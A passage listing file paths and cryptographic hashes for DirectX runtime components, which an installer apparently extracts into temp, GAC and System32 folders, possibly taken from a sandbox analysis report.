SHA512 c096f0f11fb306c6a84886826306fe9c2862c3c79b14a8991a174224b41c2a68b76e5be506494d23d354384c715c5d82a1cacffff9644de9d6b93e9478087a1d

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Diagnostics\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Diagnostics.dll

MD5 c0843f0f45edeef233b1e581ae75e3bb
SHA1 04569c78868eaa8927ba64f93312720117152843
SHA256 8c9685959706750091b0094522cec8644de1d1c6309e7a2fe02cef130d3a2b9c
SHA512 8fc293f5c5de65893d92c54f921c84f8a3f44fc733445dda7907ee09d062371ef05c11d014ba2017fd15908b911d0185a14b89d0a311a870fa33650c3176e442

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3D\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Direct3D.dll

MD5 7ad4d9fabd109432eed91b359ceae430
SHA1 c1dcddd86f9fc630cc0231acd7b732fd55dc5f63
SHA256 f3359d5e41b1d4fec7230579a593e40fe44f6afdfacd1e2bbe52ee06d84686fb
SHA512 bfeaba581a7aeff86bac0c184da823e4a26516a3c4f39af6b6b1bfced73117f3816c567b182f4da0df1935a6e97b6d0520cf02f518736b52fd27d37750e863fb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2905.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 fb3bc0754921873a65f5fbdca845e6ee
SHA1 67cde5bc8577cd3040e275d290ac021874da9fe8
SHA256 f500c350dd71df7452b92444e19b4644b04283434a6557123f1e4d9fb078c3f8
SHA512 292b8bda44e6ff6449c4b38da9b8317491c0f0da3d1e5f7947741de27cc51bbc078fbf947c89c4be3a0b54f7066f0480990d1de57919edba3414aace77c47635

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2910.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 933085360527de1b4947289ca468184e
SHA1 d5ee5e1e3c992c7518b5ce510c627c1564131b12
SHA256 78d85f0e2cb7d7bde534222f4ebfea1c9e06d37ecd3bb7ebd59e35f00b94b11d
SHA512 2e22398d7cdcd6a46daf3dd3478d861bc4012ba1b54862311ae031ebcd3f908352157cbeea528f22ef1824f8924c3f217311feaf1804cf675eafc07a8d3962eb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.dll

MD5 0c453970e89db1c1eb9de087e6eab5ba
SHA1 c4c7e034773a240909332814f499730575a1cd71
SHA256 942e98f142373547493f13b14e1603b2420851aff013d3085bada7b6b2214d9c
SHA512 ef3b2cc2598b4ea58f00f93155319674450c8c35b706108ce3bbb5c2502efa179046d9d50e12725e6dc7a555f4880404ed03de15a0753606f20a1654799886fb

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.DirectSound\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectSound.dll

MD5 d035348ec8968861af585b7132fe4c7b
SHA1 877ffdf77b9cdc1be14135cff0b756a231401617
SHA256 2e28c8fb8b87b5ffd1e0ea27710a2e785ef4741a89e4b3c3af726ec63d15a1fa
SHA512 94358b581510c68049ac92990674a6cb495cb8ff005f7fc03696c57ba8b4cb384c5035d9332d0ea39093ba5fa5c8082143896cd2fc7ac24a192520789c707458

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.DirectPlay\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectPlay.dll

MD5 46f26e2bafd44960e7f13b2ef80aa0bc
SHA1 2277bc8980e0f6c3672c2348b0494f0cc0ad611a
SHA256 489f65e1e00534835486e9255eec92b83edae4dade6dff867a380859ae53006a
SHA512 5b5147940803bccd0184b46e60560f967831541e707b5ef19781103e31235f1ba05d00e44a6f2ed061ebf5dd7013d9c696131a3edaa77d3aabb85b3255ba5489

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.DirectInput\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectInput.dll

MD5 cebd995ddeab2c525a5c4e95789bc961
SHA1 1c98da39d7eea36d73b361ddb24054038c2b8331
SHA256 0ee2a2c371a918cabc85143202864d0c3a4abf1b93a5029081a622e0acf17ab7
SHA512 158b3fe6e6605eb56a99b2135df529226f9af4b001ed0c2e1fd201a60054e2201dc22245ee5a02c6e7778337f1974ee21fa088e94b13a7402e61f64658de49a1

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.DirectDraw\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.DirectDraw.dll

MD5 d9824a9dd107e598575112b4ff897292
SHA1 adcc54d159f1eeead01dbd2fbc73c808ce519920
SHA256 ff4c03bbeb292317a77c86c1c81ae9564acb984b352fbef36d66e2d8bcbd79a8
SHA512 caa1f0411e0470a315ee8c7a62defa972ff17557bcfcf74016c64ad11b0f6fa46a126131a18e275e59e025814545e1d7ffe145377f6a0bcdb8cc93471e4c9bd4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2911.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 25c76c1e29d3e8e7398f0901f558a629
SHA1 2e907c9688a025538f1b2d0cf1860a2ae49fd2e9
SHA256 2ee41d4d591a39d648e90db4d47d0fa0557fd68197756ee2ee94fcde4d820cfa
SHA512 7308fd91859d00debf446bd6b594f3ea196dbe46a3583858c76d2cbb008a8698207f1ce7746afe3de4efb9a27980f5f813c77cc88e273fa82b2695d8f3d15039

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2909.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 490807c150b7d8be44bde871f4df8c56
SHA1 69b68a5b8cc3f3e75aa2ba284654ca58bb62f23e
SHA256 36a21fc4f4c8f6ba4ad900613ee1b08ff43f2545585a2601c9fc4cf083d68a77
SHA512 9442e26de55009428cc6e747637c2cb64bd2f008541ccbb37fed4e83ff66845c7cf3874d93542e0ba544e2db61f4864b665b7720568eba284beb095489f3ca64

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2908.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 43c280c3b15ceb2472ab560d09629664
SHA1 e3a897d7608d03c93b5c2b8aef52703452cf6696
SHA256 bebbc40ca25ef22e9d16b0de1123e0cb0444fe7a78b4f0b4395bdfd81618698c
SHA512 5229eef9153b992684b6dcb4a32b231c63322b5e4b49ef262228c0dcca4760f97cda5d15a7fcdf77d813eb24b359101e716f72988374106ace13473f27e731c5

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2907.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 ccd53738df4fa27849b6bb05dd67d10d
SHA1 28126653a3d1b4574fcb0c09176f5fa0ff28ef78
SHA256 c29d337bf7639fbf424b34cc0409d2715762e1b4d82881fb524a2508381c9f62
SHA512 aa3a10504fbe49a4c44151beec7d9b543f4b89a51621fa60810f385bdc8a6821e4bfc37cd46f3688013f6f4facd33ab45bd0deb4a1fe16453e1be8f11f2119c3

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2906.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 afcf5f50c632f3a5598abc28f196d77c
SHA1 294385693592f9d6320f8b0b18f45bc194d01a4d
SHA256 5e90089e69e4f7e2e42ea4a81fb62005c3710d0a4acdf207b97ed03f5641d013
SHA512 29746ffc665051e13386e452c3e41a593b6339e09a228927929be100cddb3e0e0fd3b54abe02eb7d46a3d97466ecb02bac362398b72fd8e804cbb21c8bc856d9

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2904.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 d3f1922325be8e7e1c72bfd8179454ce
SHA1 89134f43ce2af4adfbc4087392aee6fe56be7ff4
SHA256 8418941d8f1d4c84288e0bf54392378dd3d87b602bb693ff4f8a633022681c12
SHA512 d33f513ff6c199acabe86eca6dc06d56c330ccb78be4d13fb6b1906a3cba3c93afe982b05cb057f2b88f6e6637452f4d99d4a4fe6f3f7c473de9e67a40758bed

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2903.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 5e2b8b8a5ed016468716b9ff82a1806f
SHA1 f1772121149d87745738cd471d0e504301a9ad0d
SHA256 5b70f0ac40a38c903062a12ff7cd71d907e75238a044ded9b34fb51e9a9a2799
SHA512 4620c9bafb7dfaa8d4351d0d99ae3442ceb2220201f16bd9bab4fbeb1f411fd63d4f0e79abf6e762f4d0e62d42608fbeebd13943ce338eca59ad1080ea6c2728

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\x86\GAC\Microsoft.DirectX.Direct3DX\1.0.2902.0__31bf3856ad364e35\Microsoft.DirectX.Direct3DX.dll

MD5 a73e7421449cca62b0561bad4c8ef23d
SHA1 cf51ca7d28fcdc79c215450fb759ffe9101b6cfe
SHA256 7986e3fbe05418fe5d8425f2f1b76b7a7b09952f3ec560b286dd744bf7178059
SHA512 63d24647ac5d0beb8f1284973927263cb6e05b4c399cda3912178114b42d541dd516c6d67a453ea997d9d0cd9126a1802678062f0951c2547e1b445ba50dfbe4

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\set_x64.cmd

MD5 80533f8a7b9241d9ebd14ea5f93b9e13
SHA1 3bb90809c92a801fdc73849894630ac08f3f18c1
SHA256 d72fb04bf4f857b7fafa4e83b6cbc34144085a828c57e145a81c44dafd2aabf1
SHA512 8fea92005154f3a9d2453f7e6f83f975e5b39f85a686de54ba92c714160a04ee031e31c65480905ab41ee83037e4f79b8fd6d116b2c6d85fdfd509d3b85fed9b

C:\Windows\assembly\GAC\Microsoft.DirectX\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 7866a243265a231fa4290984da12cd44
SHA1 9c8651c8f063aeacf3203af685f10be914fb7368
SHA256 ff62666330d163eab0582feeec358d382e21d3f0f8ed1e95e3985eaea5d3aa19
SHA512 078e90045529485aad753d015892979766f15d5d646e81c8f3c52652cc593ceef1e07d6815c237c887aced2538973ba3d1effbc636f2f645dc79c7e0225a86be

C:\Windows\assembly\GAC\Microsoft.DirectX.AudioVideoPlayback\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 bd5f8ed7db39439cf5f23f9b17642add
SHA1 457279a0853dcba20ba279073eee26b21acdf6dd
SHA256 15d015cd42c692024f004f47a8a6ba7f32408759091d7b06ffc897596501d605
SHA512 1b185c12c676b0aff9b1d3de43d9137e1f83e332b4e63edb14a1b307494db344c618a48f7d2e10d99502e3beb90c57183affa4add01dcbebdb5c9df324d6ab95

C:\Windows\assembly\GAC\Microsoft.DirectX.Diagnostics\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 c973006748cdd83902293cf8648e9e1a
SHA1 bffb718abd99df9e09383e8bfe866ee8f5795b96
SHA256 01cc608547fa882f3f987995b9305e97fa42df68a6a09b34749e71fe7952391a
SHA512 343d3c807cba496d9a0179e011d9596b18ae03e3259091e4a5e61b01e8fa2d855cc42782182bfabdb38ef8811337de9f8f3d9a89614e86ff9ad16aca0fd0d52c

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 fc0a052c477b13aa39659e77f999dc2e
SHA1 df3c61c5f3750b47d10bfb59bf18df854a4b9e56
SHA256 c6ff432d7b3ee5a9115e40f6165e314ffb81450589861471ec209cdb7e3f46fa
SHA512 ad49a3b020d7e5de2252cdb4a8eef5b676bd56e15622f94f3d5de957813d853f6eea211001c949c5c3cacd90a21627048596ec153039302c567f597d5a18ab37

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2903.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 f5b344a085acf8c0c4c79cf96d8eebec
SHA1 65369857e2e186739a79ea7d5f8432504cfd34e4
SHA256 7f37df5cef25aee3be4e6c8f751e1c7278acc2f8b7eb0bc2a397706b0b49857b
SHA512 b224edbb97a04f6b614b64e860989d797286c204a538ab649e81b7209d6874cfec5a3983dbca449a8d147c7ac5d1e6874598105bbbb4df1c761d576dd795b0c8

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3D\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 fb36a55567d3dc3a1f409f21663bbf95
SHA1 2cb2e4938bae2eb85d72dd18b0849813611d710a
SHA256 8cd1fc0c30badafb40b2d1b92e1d595dcdf77303ab6949670c863b12f3a7a574
SHA512 5f1635a5eb217515f2d57dee55a3859795f929d1cf6d452dd273c638ac28eb6ab41906d29db92e4e423f3ea8a984437746ed0ae4c4c1c95309f7739adf24f341

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2904.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 57c181887f9615f478974f2453da6391
SHA1 79c6003cf265a915cdeb42d09e5667dd4cdbf2e4
SHA256 339e418d4899b874eaf3961d0ee7310047289c3337884a03a85da1033089e087
SHA512 354ff81682e6ffa612b2ce5fa1a8a4a0a73a23daa2e586fd98f15aaa5eac85c8a4713e7012b6f79b948f42f33a925a9f4919d28f5f0feaec1849a3c5db221e25

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2905.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 774e147457a2860bdd3c642200782f5a
SHA1 ff2b8976a35b0a4e7e1f5d374250af31766c58e4
SHA256 ae898cddeb8583fa47284c516f504780e94d4c95715cdaaee4519e7b0e5e27ff
SHA512 0427cd6da27d38dd06c872ec904f266b40281ab550246b6d5b5f4a362255505c62739dba95f301db39dec55417ede926a7323c20e6f8d598d4affe44d3b91a81

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2906.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 b0a0b4c6ea822081e8f0bab3e128d9e8
SHA1 28ffd78b77e12e8430cd6006108ddb6f6844f746
SHA256 b73f07b7f096c68f6125a4a7716f356001a6b38e34905bbab32e359fd51815a6
SHA512 b58579a0d7ef8c04aeae1eeb83021aba56101b0a29ad008926bf5a0b8512561e64b899ae99f45d5841635db66c4c47b56f724d673b2f0da4e49ea19b6781c30a

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2907.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 e82e4d729fc6cd877b684cd1a9f09b86
SHA1 a0c0ad704dbc2a5e7c34026d83356fa2e5f8207e
SHA256 4c03cbf640aed9323bcc8754d3f768fe43b3680d102831851e8bc128b2d401c8
SHA512 114cb57f0ccd383c3604bdd8a7bd7fc3b26e11dc3ca0fa49677f58994c5845ae1d993e51087af86ed069c0c36a805086b56882a1641d18e6447163caf3c11d4a

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2908.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 76de838aa6630e1fb9a80a247cd9dafe
SHA1 9d814858d6c8803b5f0c89ca1eff1b928f12ff2d
SHA256 4b5975251c01ce562b9fe70029988202344d007eb7072279f2bcc61b05e954ef
SHA512 0585cf62b06f85f3616180129a13ca2b16ae61178f177edb90ce5056d8e17dee6568b080f22e1a95b341f7bd6b24a1c246444055a7041b58e65f6c5e38e2de3c

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2909.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 826acae54859bc7ebef2d7ae90d2f1cb
SHA1 9af30d84b7b0be9e71f9c218c2c5d7c1a5067404
SHA256 593a2113d7760c8895b906c27d1c320904ea46fbec32c58d8253598227e20261
SHA512 34ff1702318eea40708b88ce027d2ba99381469c49f3f377df2d918878b35ea2e9f36a836068312668d2914f403f439ebd506246832190122fd8c60a6bdc70ca

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2910.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 43bcecd239fc92367edc41ec971e2856
SHA1 f4f70cd9bc9c48ad326b877804c048a9fbb1d48a
SHA256 2c8ca5aaeb3e271edd054d6bae44d70f9d7ea362bc970c1cd8fdccd5b35defe3
SHA512 feff79f78de879a468b8ab2b3d45eafe617ed3de57b78381ce269c4b52775b6cd9422d3e4565d59344c04f7a8949bf694e4f4bf376f8bbfa338029fb4fe994c4

C:\Windows\assembly\GAC\Microsoft.DirectX.Direct3DX\1.0.2911.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 05a965f18b8d7b736f0543f96b89f6ca
SHA1 1004dbfb2128eedba659029e699b4a596f429a44
SHA256 5d0ec650a3bb39ab54f38a3ec8f932c0a50e559c7c1fe3f389bae0768753b1bb
SHA512 a48922987ece729f39ea5e0acc99265173065d609e1ae262cbe4ff8bb07e09597ae827f2ebd4ac946b1a3b745ba0ce4df540431c96d444c8368ff97dc5f1e25d

C:\Windows\assembly\GAC\Microsoft.DirectX.DirectDraw\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 2ab0e13dee96f5ff207e4c1bd415808f
SHA1 1248234624cac470c2f87d36b37ba27fe5eef856
SHA256 b0f47ccd6d6f710eb77c3c04af0e9461b4d5501b6d7310d4aa79cb6d6088eda0
SHA512 989415a9624818d646972c1a21a5d65d64a7ae1d70e3221168e23c5ea6afea4bc727d1fb2853e6f1382de159f49eb34ee11a28c0077a3c8f2af79b26b5f0767d

C:\Windows\assembly\GAC\Microsoft.DirectX.DirectInput\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 2323e8c944d85a1a3e6d9ef78ca7b092
SHA1 0fba85daafe22779da77c8cfb86569c38ccb5518
SHA256 e20b067fc4e29dc4a467187f085d89d19fd1dde0da9b19e01955af4086d9e0c8
SHA512 2ec8f383debd2ca772867b77a501cc932a1b437dc42bc0a478704c5b0bf153ce419cb0152eaaf1d6d807ccfec66319116c460f4584c7484269e2159a2b773351

C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 faf707724a740277714e33a65f4995bf
SHA1 f5d715d9d59d6bd7a31567125d32332fe1886854
SHA256 4e2a4865e5bd54c77473e00aca185ba9aedfc7e067e437648df7dda97dccdb32
SHA512 c7f44573df66be3e88fd5f9c2a08491d5c1f4333cfc9fe401d7edf0797a8ee850a0d3f2dcd452bee3f1251d54ba58dc69ac4ed8f82ed0da8f0fec680be9342a2

C:\Windows\assembly\GAC\Microsoft.Ink\1.7.2600.2180__31bf3856ad364e35\Microsoft.Ink.dll

MD5 a02ee61542caae25f8a44c9428d30247
SHA1 067495dd6a6d722757ebd94f269ef15f4198a239
SHA256 71b330cffc2bde77bd77c254280c8a9041ac98a9a7868b21e09e0fcd3953e672
SHA512 37f4516f998a4a020ac18ec02f083a4132d100794f0bd3e02f8b8dea8846732e460cde34d62d6b89030ac1377d573af598250ed9708ebf42869025a1e7248e92

C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 3a74c27634435f509dc024feebe670e5
SHA1 1a83169ce6f0d2777568afad8480b9fb45543d4a
SHA256 8fc184471e8229e04bf9b00e12d92ac12e18c8c430c46503b36da1a103314ad5
SHA512 e09f16fbbd781342cce59c15278b6d10f69f5a838db6df44d20ec400d4ad283b07a1b06e8e6522d8f9fed8698fe6437a997b71577a9f9c3213b2a7c7d73069de

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Diagnostics.xml

MD5 3b535543a4826d71679669e1880f51f7
SHA1 43e64a3a59a6502217d216415115f67b401f6c15
SHA256 73b5cf6b8ef13759e6a8131a71389928eae8c678344034ee57a5a8eaf2b82182
SHA512 34fa0c10daac12e249224584b2197793671487361dd3d30324a74f9fbecf9d4b983cdf9ce3bce1e3e89ede19c7a8b4a97b2581ec48020c9ee3c4e2bfafa224cb

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.Direct3D.xml

MD5 6af4b128e10199df1c693f6160988838
SHA1 df308d8bf7227efc27f6915d7dcedff23c397f11
SHA256 3c76cbd0841fbf6044dab6af73b770e044666b5e8336e92d74f330677ae4816a
SHA512 28522459dd395cc576e0167b6e49d9511bc65ebee7c689451bce8deaecd03c4433181bde0d6e8d49ce407c64743face3471e10e17f9f5a38abe393ebfb0dd878

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.AudioVideoPlayback.xml

MD5 b82423568ecf1d9a1e79142962fd66d5
SHA1 7e85cfa952a7468ac35b02f256f0891d327e95bc
SHA256 d7ac200711a20e1e93fe3b61254f6535e7589e52baaedb396ae5f292a9f4be43
SHA512 0b10003b36bf5b145d18717c8974832bb3ed72c5aed7fae304514186ddcee88f809b4975bad28002db6300fca2db12b5d844b4f4449b1924c5bb860a581637f9

C:\Windows\assembly\GAC\Microsoft.Ink\1.0.2201.0__31bf3856ad364e35\Microsoft.Ink.dll

MD5 dd2eb5e64619613c4c108cfb192f4950
SHA1 158036cadccedb7b35490c23e550310385c9c7be
SHA256 338edffffeb28aa47aabfd58d328915a6f6263cc9ab379c7294bdc5d544871b5
SHA512 d2c47b83aeeaf6404273d0ca2dafff7e8e2215d928b9ce7d9e8dc1d36119e29cbc7f2fa3e16300b7785d6c20641f4cfd736b71c92d2f54cd38397d385b1a6460

C:\Windows\assembly\GAC\Microsoft.DirectX.DirectSound\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 a50d18a73fc028effaa5086deb909a2a
SHA1 5fb3114bbf653a477203f0dedd113fa30d8886e9
SHA256 2c043baa80c15f29808c0cc4dc557aff6cae9c376081b945e52243d165a08611
SHA512 62e7d03239cfd6f551bc2966270272638d24efd9e6476c5f6ec0b42ffb6293efeabe74b3c3e505ebf0c03785957b949c7428bda307c31b06e7ff5ea0f4406f88

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectInput.xml

MD5 6528465da062cf483f754cad64137d2d
SHA1 1976a7ff25e1e090ec415056582f1bf6d68f5fd5
SHA256 6b66e10478cbe44c5a112fd0ed4e1d4b94ac34ac197cf2859082269127600819
SHA512 5f23df82c73a54d5b451c348e09566e2e6536833ffed6082882bde2b7c4a4723601500ebd7b146c76d8ddbf946d9137643028169dbf39e62f429dac53deec438

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectPlay.xml

MD5 ef20b9e7bab9ec215addd96faffce4ed
SHA1 0539f00904baea079f1c8310e1f7ada0035820c8
SHA256 5653483207a6e0e821afcbeb9c9ffdb7130502c5941f8df55a1d1dd29564aa03
SHA512 4a9bf7712417034066962f639534bccb619a720ffad2bf8b155fef744bb575cc6b74e426ea5716afad8f8d645886a5b083cf548588efdca60c4bf605d3e6dc96

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.xml

MD5 e7de298cc763712aa289339f2a18f4b6
SHA1 c9b7200a33fff144fdc98d81f8a9ab521952b0c8
SHA256 8600ecd86af17dca452991e55d7f54db97d9a99d81418016969677ea3ec96abb
SHA512 ea9b81bb18fa966695bf1ed06158a2cea3730540b1fddb8ef2668f61cd053d52ff7cd75888477f1bc3c6c84c9a38e81490ad29975dfa1c4ac5e6005cd0890cc1

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectSound.xml

MD5 17d9f4cb25043942bbf4993c78916660
SHA1 7a112b31983f3bbd50994f67587d7731f27c6812
SHA256 65cdf4c3456fb46797776edcde06e16b1c17a1defc1c94c0c2af62f63a5cb2d6
SHA512 aba64fb373ad21f6ba5e8dbe92b562c78caeb4b7e95a73bbe92891118c1a84a50d38e33b76b67d8e60c64c95efb2850718c3dee6d7ae956cf085f5906904057a

C:\Windows\Microsoft.NET\DirectX for Managed Code\1.0.2902.0\Microsoft.DirectX.DirectDraw.xml

MD5 deb9edb5c271d99e8fcd52f207aeccda
SHA1 2b394b682ffea5de219664a53588bc38707dd229
SHA256 4ae5c1ca9e8583dfaf856e32111a36e5802962101d2b67e1f50800d3cde3bce4
SHA512 639bbe9df406d77a70c22e72ac1566f841ca632936e53a183ec4ef39c0e6b2af7e6289360bbc03dced9a6054ae6d0a68fbcc6898027830d3ee0e85ea3a65c8d7

C:\Windows\assembly\GAC\Microsoft.DirectX.DirectPlay\1.0.2902.0__31bf3856ad364e35\__AssemblyInfo__.ini

MD5 c80e82d19776af5d22315123d29006b4
SHA1 88c3915b369b47b7ddce4410f0127c6180dbe526
SHA256 ce6dee8ca0192b6638746b84d4f0d129f3fd6e11454713194c5438c6436daaf6
SHA512 ec8a6018f5d46efc04eaf24acb8d042da2b44deb378b8b01c1d0b3c544a58a6f81f3b73e8519a3a32d3e8ae0308877744b22b2144d091381026020c813390d20

C:\Windows\System32\D3DCompiler_37.dll

MD5 31026cea5afa2798292179102c06fe40
SHA1 d0a4291094d188e3132eff6c566f1a4074036965
SHA256 425f0d7ee0f2845424266aa56f2cdce3a61541d5e2c7d7813f4373e45df0cb8b
SHA512 5131bb146140bc5a9e3abd5408519d1bc350f64ff0c39ba10ad2ef576f5e45e6e55b7d4bbf75d443c825ff03f736fe71cf0f2430cf588cb5eedbf9b8d37471df

C:\Windows\System32\d3dx10.dll

MD5 8251826f04ba0822d08ad9b92c65a3d5
SHA1 5468f1ee33710b5ad4dd43ab6eaf2e5e5cb2099c
SHA256 03115a37f75fffb7abf07a59ec6ecb5217d3479bc95f92846c7e9b91822a0567
SHA512 bd7a36d8bc7885f549b255e1bb636580c9235c36d34f8abb5623c23d3900df416150a79688eb464340fb394262a156c2bd612ee8f9d7e6a858b288c0eb4d2cb0

C:\Windows\System32\d3dx10_39.dll

MD5 eaa692fdc990ed0407df957316da33c2
SHA1 22f313b0f533c483a726fe5b8d3b0bd1e194081a
SHA256 1ec45bdb37e9f8bf7b6684deff6799b06d4bc2e2ef72b5f278d6c4b3a7597b13
SHA512 cecf719e933df47575142316c617e9895882309823f0861dc7b689f31b237c688ef027f560abde84c5da0d9b2cde19c0201f27f1887557845d5d914439e73060

C:\Windows\System32\d3dx10_43.dll

MD5 ad7fa9485059f4dc53c98b49cab13f0b
SHA1 eecc2f4b2fe17d9d8b9e3abd7160503d10c0d14c
SHA256 9bffa1ea073d79e9954cb398fc91b93ed9dc79ed2205995d4b949f1cc2ad3bd1
SHA512 ad703a57490a01f4e92201fafaeefa8bc60748aeb18be8c527ac0918b2a35f2a7884c9fbc4b23a3da03ad66954653f3e4314399ae1d9dd4509efce9b355e212b

C:\Windows\System32\d3dx9_25.dll

MD5 4c56e7c5b2a61353e534c7d15d05856d
SHA1 e6e0a59a1e8217ae06cda29942537bc4be25d5a1
SHA256 10b09474bfe4e2bb395472628646bc5f353fbfbec976575c45eeff49984ebaa6
SHA512 6f630ea0764b4551d80a96f6c2b9391ed5741f14431eec951699c0e42b9434a45841d71bea5576b285cc20d38fd082b4cfc8062e4aa61f80aed9e57869cdd5d2

C:\Windows\System32\d3dx9_28.dll

MD5 88bac8306d4ec79a82b1ffa17dc8cf4a
SHA1 0a0ab361f04ccba8268418ebff098d3da1ac26a9
SHA256 a2870f86e2f1b11646ff3f404bdbde10520c481c1400b20d25fdf56e66fb0a17
SHA512 b664033e270d71ff88139bb3e71fcdfc8417f65d7c80a12f921a60b0d825ebfe26a14bf16f9d23a10af5c866c1715e21c879993f9be1c54261c376a7cbbe511f

C:\Windows\System32\d3dx9_30.dll

MD5 e09a9cf383acf4a28038561e62277377
SHA1 131060defdee3648bc43d35830d9409ff921bd85
SHA256 7d1374e3b921a70b5028472ab164d9e582e3c3525334235d642664189da9b157
SHA512 6350b6931504bd37886fcbf577436b2c5b0cdb1c4b5b3027c4ae03dbb36edf7674f10fc457115b0d8e913b693af2666b5dd4b97b843aa7eb379940c780ea6ac9

C:\Windows\System32\D3DX9_39.dll

MD5 7505c133fc704b40cfddfd38777baac3
SHA1 34fcfe7be4a9ea08c63b6f5392ac8cd10a05827a
SHA256 aecbe2965f7c9aa60257670114c06b21a3de914b03e20ff569c5cb44ec4807fd
SHA512 8ca2d8be9dd148587906b154ec9d3ca0d1d7cd781c2bf307011407303fce981acce63d28329083a6a731442743732789aaea0a7bbd4e2d2a57d4f3e284f7b471

C:\Windows\System32\xactengine3_4.dll

MD5 1ba01062450bd1f052c54c01c12248f6
SHA1 07976c294808651ac8e835154956b7b3e01957f5
SHA256 e4296c55d860e9f14f91c58841a7100036152d55bcb4bdcdf659ddc1d8a4c52f
SHA512 e7c796c9b68be98dd2b609d99ad317fae1ac612163f6a9033e3b663b5b30bc8e1b23e4956e5dcbb189b71c807bfcea063185217959f571492fcb810808385f5c

C:\Windows\SysWOW64\xinput1_3.dll

MD5 77f595dee5ffacea72b135b1fce1312e
